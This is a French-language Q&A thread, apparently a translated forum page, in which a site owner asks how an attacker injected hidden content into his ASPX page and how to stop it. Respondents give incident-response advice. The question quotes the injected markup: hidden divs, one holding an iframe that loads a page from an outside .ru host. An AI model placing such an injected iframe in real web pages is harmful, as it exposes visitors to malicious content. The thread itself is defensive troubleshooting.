1. Accueil
  2. Question et réponse
  3. Je suis attaqué - que puis-je faire?

Je suis attaqué - que puis-je faire?

2009-10-07 7 views
3

Quelqu'un met ce code sur ma page aspx.Je suis attaqué - que puis-je faire?

Que font-ils?

Comment le font-ils?

Comment les arrêter?

Il s'agit d'un serveur d'hébergement partagé.

Il est sur une page de contenu ASPX qui a une page principale et après la balise </asp:content> ...

<div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div> 

<div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div> 

<div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div> 

<div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div> 

<div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div> 

<div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="http://bionaft.ru:8080/index.php" ></iframe></div>

Source

2009-10-07 Brendan Waters

+0

thats le Code

qzfmjsdbknmrmlkszrrcehikeapphqq
owhkhminltvnwvegxktzemrszyykcsh
cljwdrmbxglllikbjctmpyvcflzxbqk
vhhnvchdoxaklqjxlwaqvtgarazwcsx
alsbcgosnllreyylgtmblvqwxgpidui
yrrzaimkpvimddgirjpuatjzoyovdyq

+0

s'il vous plaît fournir plus d'informations à quel code êtes-vous exécutiez exactement sur cette page. prenez-vous des entrées d'utilisateur sous quelque forme que ce soit (chaînes de requête, formulaire, etc.)? – Raj

+0

Quelle est l'URL? –

Répondre

39

Prenez votre site hors ligne.

Non, je suis sérieux. Mettez-le hors ligne et examinez tous les points que vous traitez avec les entrées utilisateur et examinez votre code et désinfectez chaque entrée utilisateur et chaque sortie. Il y a beaucoup de documentation sur XSS, l'injection de code et autres.

Source

2009-10-07 09:11:06 squeeks

+0

Etes-vous sérieux, c'est un site de production avec des clients, y at-il un moyen de –

+10

Bien sûr, je suis sérieux, vous le laissez tourner comme il est, et les moteurs de recherche vont l'explorer avec les données malveillantes et vous mettre sur la liste noire pour l'hébergement de contenu malveillant, une bannière qui prend beaucoup de temps Récupérez vos journaux de serveur Web et votre code, déconnectez ce site, nettoyez le code qu'ils ont injecté et désinfectez vos entrées – squeeks

+0

Merci pour votre aide et votre message. répondre. –

1

Comment la page est-elle rendue - y a-t-il du contenu provenant d'une base de données? Quelle est l'URL? avez-vous défini validateRequest sur false?

plus d'informations nécessaire, je pense

Source

2009-10-07 09:24:24 Paul

+0

Aussi, avez-vous téléchargé le fichier source pour le aspx ou ascx (ou autre) pour la page en question? Est-ce que cela ressemble à votre version contrôlée par la source? – Paul

+0

non il a le code injecté dedans. Je l'ai enlevé la nuit dernière et son dos j'ai aussi eu environ 16o erreurs sur mon site avec mes fichiers CSS je pense qu'ils cherchaient quelque chose, mais ils ont le chemin vers les fichiers CSS incorrect –

+0

On dirait que le serveur a été compromis. Si c'est un serveur mangé, passez au téléphone à l'hôte ... sinon, j'aurais probablement aplatir et tout réinstaller avec de nouveaux mots de passe. Si cela n'est pas possible, changez tous les mots de passe - vérifiez les comptes d'utilisateurs sur le serveur - supprimez tout ce que vous ne connaissez pas. – Paul

2

Est-il encore une autre attaque automatisée SQL Injection? Vérifiez vos journaux et voyez s'il y a quelque chose avec "DECLARE" dedans. (En supposant que vous utilisez SQL Server)

Source

2009-10-07 09:24:42

1

Il est sur une page de contenu ASPX qui a une page principale et après la balise </asp:content> ...

Voulez-vous dire que quelqu'un a obtenu sur votre sever et édité les fichiers .aspx sur le serveur? Si c'est le cas, assurez-vous d'avoir verrouillé tous les partages de fichiers et de changer tous vos mots de passe pour ftp et autres.

Si les pages restituées ont été écrasées, alors le conseil de @squeeks est le chemin à suivre.

Source

2009-10-07 09:29:35 ilivewithian

+0

La page est dynamiquement entraînée à partir de la base de données. ValidateRequest n'est pas défini sur false. Je ne vois aucune donnée étrange dans les journaux ou les tables dans la base de données qui sont affectées par cette page. Il est en dehors des balises de contenu sur la page aspx ... Je commence à penser que mon mot de passe a été compromis –

2

Il semble que vous n'êtes pas le seul. Google pour cela:

Source

2009-10-07 09:54:39 borjab

0

Essayez d'examiner la librairie AntiXSS; les pages importantes, désactivez-les pendant un moment. Je crois que vous devrez mettre à jour le code, utilisez AntiXSS dans chaque URL; basculez toute votre génération de requête directe vers la génération de requête basée sur un paramètre; et que, les choses seront sous contrôle. En outre, il y a beaucoup de choses concernant les éléments de la liste blanche sur google/bing.

Source

2009-10-07 10:01:26

Questions connexes

 Questions connexes